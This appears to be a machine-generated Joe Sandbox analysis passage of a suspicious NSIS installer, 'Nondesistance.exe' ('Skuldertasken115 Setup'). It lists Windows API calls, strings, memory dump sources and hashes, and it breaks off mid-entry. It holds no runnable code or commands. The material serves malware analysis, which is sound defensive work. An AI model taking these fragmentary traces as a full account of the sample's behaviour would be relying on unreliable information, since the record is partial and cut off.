                                                                                                  • String ID:
                                                                                                  • API String ID: 2320649405-0
                                                                                                  APIs
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 1000234A
                                                                                                    • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
                                                                                                  • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 100022FB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20224243573.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_10000000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                                  • String ID:
                                                                                                  • API String ID: 3730416702-0
                                                                                                  APIs
                                                                                                    • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                                  • GlobalFree.KERNEL32(?), ref: 100024B5
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 100024EF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20224243573.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_10000000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$Free$Alloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1780285237-0
                                                                                                  • Opcode ID: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                                                  • Instruction ID: 4e6b36a645f71e2aed4a85f2c36ff1861f2741140ba068ae73f9b0a79c1593cf
                                                                                                  • Opcode Fuzzy Hash: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                                                  • Instruction Fuzzy Hash: EA319CB1504250EFF322CF64CCC4C6B7BBDEB852D4B124529FA4193168CB31AC94DB62
                                                                                                  APIs
                                                                                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040482E
                                                                                                  • GetMessagePos.USER32 ref: 00404836
                                                                                                  • ScreenToClient.USER32(?,?), ref: 00404850
                                                                                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404862
                                                                                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404888
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                  • String ID: f
                                                                                                  • API String ID: 41195575-1993550816
                                                                                                  • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                                  • Instruction ID: 72a6dff9965abeea3fde93c43f55bc8d1d0b984f63b53e8c81f3052648e7bb03
                                                                                                  • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                                  • Instruction Fuzzy Hash: EC019275D00218BADB00DBA5DC41FFEBBBCAF45711F10412BBB10B61C0C7B4A5018BA5
                                                                                                  APIs
                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                                                                                  • GlobalFree.KERNEL32(?), ref: 0040276F
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402782
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
                                                                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 2667972263-0
                                                                                                  • Opcode ID: 9b9e1748d849d950a99293442005731c31a3644dc9cf68e8f7c185ad44726307
                                                                                                  • Instruction ID: 5d6717e5ef000630179c441ec4dabf90fe6e4dbd5b0bc7dedcefa97c90ee8361
                                                                                                  • Opcode Fuzzy Hash: 9b9e1748d849d950a99293442005731c31a3644dc9cf68e8f7c185ad44726307
                                                                                                  • Instruction Fuzzy Hash: 1D215E71800124BBCF216FA5CE49EAE7E79EF09324F14423AF910762D1D7795D418FA9
                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32(Skuldertasken115 Setup: Installing,Skuldertasken115 Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                                                                  • wsprintfA.USER32 ref: 004047AF
                                                                                                  • SetDlgItemTextA.USER32(?,Skuldertasken115 Setup: Installing), ref: 004047C2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                  • String ID: %u.%u%s%s$Skuldertasken115 Setup: Installing
                                                                                                  • API String ID: 3540041739-1308450828
                                                                                                  • Opcode ID: bce87859891d79834da0368510b84a142a5ae8014b8f628edfe68aeb1773e92b
                                                                                                  • Instruction ID: 053aaa49463ee093dad042f908cd6657d31450f6c5b0c7846562dfb37f065ee1
                                                                                                  • Opcode Fuzzy Hash: bce87859891d79834da0368510b84a142a5ae8014b8f628edfe68aeb1773e92b
                                                                                                  • Instruction Fuzzy Hash: 0E11E473A041283BDB0065A99C45EAF3288DB82374F254237FA25F71D1EA78CC1286A8
                                                                                                  APIs
                                                                                                  • SetWindowTextA.USER32(00000000,Skuldertasken115 Setup), ref: 00403A0C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: TextWindow
                                                                                                  • String ID: "C:\Users\user\Desktop\Nondesistance.exe"$1033$Skuldertasken115 Setup$Skuldertasken115 Setup: Installing
                                                                                                  • API String ID: 530164218-1759130687
                                                                                                  • Opcode ID: 993fe79cb263d8704da8179243fb4c9b486514bba0ea53d7ba6abc6d02ddb1fb
                                                                                                  • Instruction ID: fbf6035dbb292e76ee93bcdc762ea67a79fb5cde0254510f453a1e05a67cff09
                                                                                                  • Opcode Fuzzy Hash: 993fe79cb263d8704da8179243fb4c9b486514bba0ea53d7ba6abc6d02ddb1fb
                                                                                                  • Instruction Fuzzy Hash: 97110871B046109BC730AF56DC409737B6CEF89319368423FE801A73D1D639AD03CAA9
                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32(?), ref: 00401CE2
                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                                                                  • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                                                                  • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                                                  • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                  • String ID:
                                                                                                  • API String ID: 1849352358-0
                                                                                                  • Opcode ID: 7b3151235455efa7101d04b7e9aec4a9fd05a576d48d8a2a9df35770264f85f7
                                                                                                  • Instruction ID: 718a49c372d49eeeb619100b459207f1cde729867d9d835a9e14b5832590348d
                                                                                                  • Opcode Fuzzy Hash: 7b3151235455efa7101d04b7e9aec4a9fd05a576d48d8a2a9df35770264f85f7
                                                                                                  • Instruction Fuzzy Hash: 74F0E7B2A04114AFEB01EBE4DE88DAFB7BDEB54305B10447AF602F6191C7749D018B79
                                                                                                  APIs
                                                                                                  • GetDC.USER32(?), ref: 00401D3B
                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                                                                                  • CreateFontIndirectA.GDI32(0040A818), ref: 00401DB3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                  • String ID:
                                                                                                  • API String ID: 3808545654-0
                                                                                                  • Opcode ID: a9cdf81254145861f84cf9e02fa38053c9f28bdd393431975dea51a2ca53c52c
                                                                                                  • Instruction ID: ad7d238852a8d87b5aaa3e6a204337ae93e1cce4a0b470fbec170e72a625d374
                                                                                                  • Opcode Fuzzy Hash: a9cdf81254145861f84cf9e02fa38053c9f28bdd393431975dea51a2ca53c52c
                                                                                                  • Instruction Fuzzy Hash: EA01D632944340AFEB0177B0AE4EBAA3FB49759309F108479F201B62E2C6790052CF6F
                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057A7
                                                                                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057B0
                                                                                                  • lstrcatA.KERNEL32(?,00409014), ref: 004057C1
                                                                                                  Strings
                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004057A1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                  • API String ID: 2659869361-787714339
                                                                                                  APIs
                                                                                                  • DestroyWindow.USER32(00000000,00000000,00402DE2,?), ref: 00402C15
                                                                                                  • GetTickCount.KERNEL32 ref: 00402C33
                                                                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
                                                                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402C5E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                  • String ID:
                                                                                                  • API String ID: 2102729457-0
                                                                                                  APIs
                                                                                                    • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Skuldertasken115 Setup,NSIS Error), ref: 00405D3C
                                                                                                    • Part of subcall function 0040583A: CharNextA.USER32(?,?,0042AC70,?,004058A6,0042AC70,0042AC70,77323410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,77323410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                                                                    • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
                                                                                                    • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
                                                                                                  • lstrlenA.KERNEL32(0042AC70,00000000,0042AC70,0042AC70,77323410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,77323410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E2
                                                                                                  • GetFileAttributesA.KERNEL32(0042AC70,0042AC70,0042AC70,0042AC70,0042AC70,0042AC70,00000000,0042AC70,0042AC70,77323410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,77323410,C:\Users\user\AppData\Local\Temp\), ref: 004058F2
                                                                                                  Strings
                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040588F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                  • API String ID: 3248276644-787714339
                                                                                                  APIs
                                                                                                  • IsWindowVisible.USER32(?), ref: 00404EEB
                                                                                                  • CallWindowProcA.USER32(?,?,?,?), ref: 00404F3C
                                                                                                    • Part of subcall function 00403F60: SendMessageA.USER32(000103E4,00000000,00000000,00000000), ref: 00403F72
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                  • String ID:
                                                                                                  • API String ID: 3748168415-3916222277
                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNEL32(?,77323410,00000000,C:\Users\user\AppData\Local\Temp\,004035F2,0040340C,?), ref: 00403634
                                                                                                  • GlobalFree.KERNEL32(00629790), ref: 0040363B
                                                                                                  Strings
                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040361A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Free$GlobalLibrary
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                  • API String ID: 1100898210-787714339
                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Nondesistance.exe,C:\Users\user\Desktop\Nondesistance.exe,80000000,00000003), ref: 004057EE
                                                                                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Nondesistance.exe,C:\Users\user\Desktop\Nondesistance.exe,80000000,00000003), ref: 004057FC
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CharPrevlstrlen
                                                                                                  • String ID: C:\Users\user\Desktop
                                                                                                  • API String ID: 2709904686-3443045126
                                                                                                  APIs
                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                                                                  • GlobalFree.KERNEL32(?), ref: 100011C7
                                                                                                  • GlobalFree.KERNEL32(?), ref: 100011F5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20224243573.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20224205010.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000004.00000002.20224274318.0000000010003000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 00000004.00000002.20224300969.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_10000000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$Free$Alloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1780285237-0
                                                                                                  • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                                                  • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                                                                                                  • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                                                  • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040592F
                                                                                                  • CharNextA.USER32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405940
                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                  • String ID:
                                                                                                  • API String ID: 190613189-0
                                                                                                  • Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                                                  • Instruction ID: 9438e9cad6691fea7f13f8d56426e11099e03f26c07faecbb185dc05f13043cf
                                                                                                  • Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                                                  • Instruction Fuzzy Hash: D5F06236505518FFCB129FA5DC00D9EBBA8EF16360B2540B9F800F7350D674EE01ABA9

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:0%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:23.8%
                                                                                                  Total number of Nodes:122
                                                                                                  Total number of Limit Nodes:0

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 2 325334e0-325334ec LdrInitializeThunk
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 37eefc1884c9034e82548d95c39feb8ad8635d43df97a848f0b0f8582d0ad3a0
                                                                                                  • Instruction ID: 41a167c543dd8cbb15f5bcdc8f9d1d24ce89f6e8b4a89c9e3bd896fa179a3f20
                                                                                                  • Opcode Fuzzy Hash: 37eefc1884c9034e82548d95c39feb8ad8635d43df97a848f0b0f8582d0ad3a0
                                                                                                  • Instruction Fuzzy Hash: 0F90023160510402D50075589B28746504547D0211F61CC16A0414528DCBA58A5975A2

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 32532b90-32532b9c LdrInitializeThunk
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 09736a741fbcd68a31a7b882514b70bb3954a2383953c8de15f6d00a8362af16
                                                                                                  • Instruction ID: 66fa783c4b4c2accb7dc522b3369c1b2f836a06031c7fc11ec9b8a1f74925b2c
                                                                                                  • Opcode Fuzzy Hash: 09736a741fbcd68a31a7b882514b70bb3954a2383953c8de15f6d00a8362af16
                                                                                                  • Instruction Fuzzy Hash: 9C90023120108802D5107558DA1878A404547D0311F55CC16A4414618DCAA589997121

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1 32532d10-32532d1c LdrInitializeThunk
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: e2f3f86a973ad9b6808b318ca6f96567dec7e1976fc8fb43821303f2e88fae9c
                                                                                                  • Instruction ID: 517a932533a3778022457ba6ed8bfee4659406d0d27c98b7443df9fc255b7795
                                                                                                  • Opcode Fuzzy Hash: e2f3f86a973ad9b6808b318ca6f96567dec7e1976fc8fb43821303f2e88fae9c
                                                                                                  • Instruction Fuzzy Hash: 6390023120100413D51175589B18747404947D0251F91CC17A0414518DDA668A5AB121

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DebugPrintTimes
                                                                                                  • String ID: $ $0
                                                                                                  • API String ID: 3446177414-3352262554
                                                                                                  • Opcode ID: e90d69a75c0735f6ce7255bfe0295134e6049a36b4e2ed5798c40ba4595a6118
                                                                                                  • Instruction ID: 7483766f8dafb18a5608e30aa374d36b1119c591b2a91fc6b2fc3ac336e92c83
                                                                                                  • Opcode Fuzzy Hash: e90d69a75c0735f6ce7255bfe0295134e6049a36b4e2ed5798c40ba4595a6118
                                                                                                  • Instruction Fuzzy Hash: A83213B56083818FE354CF68C984B9BBBE5BFC8348F40492EF59987250DB75DA48CB52

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_324c0000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.Q2
                                                                                                  • API String ID: 0-902425605
                                                                                                  • Opcode ID: b94917a6476fbd9558712c81592f7813458a65424068201b8ce19f7afe0f827f
                                                                                                  • Instruction ID: f8cf1539222b909254ca099c2f6e440c7c4bffa7e0a2fa66a31422d66544a6a8
                                                                                                  • Opcode Fuzzy Hash: b94917a6476fbd9558712c81592f7813458a65424068201b8ce19f7afe0f827f
                                                                                                  • Instruction Fuzzy Hash: B3B18BB5908351DBE715CE24C850B5FBBE8AB88749F40492EF986D7300DB70DA49CB92

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.20405124824.00000000324C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324C0000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000009.00000002.20405124824.00000000325ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
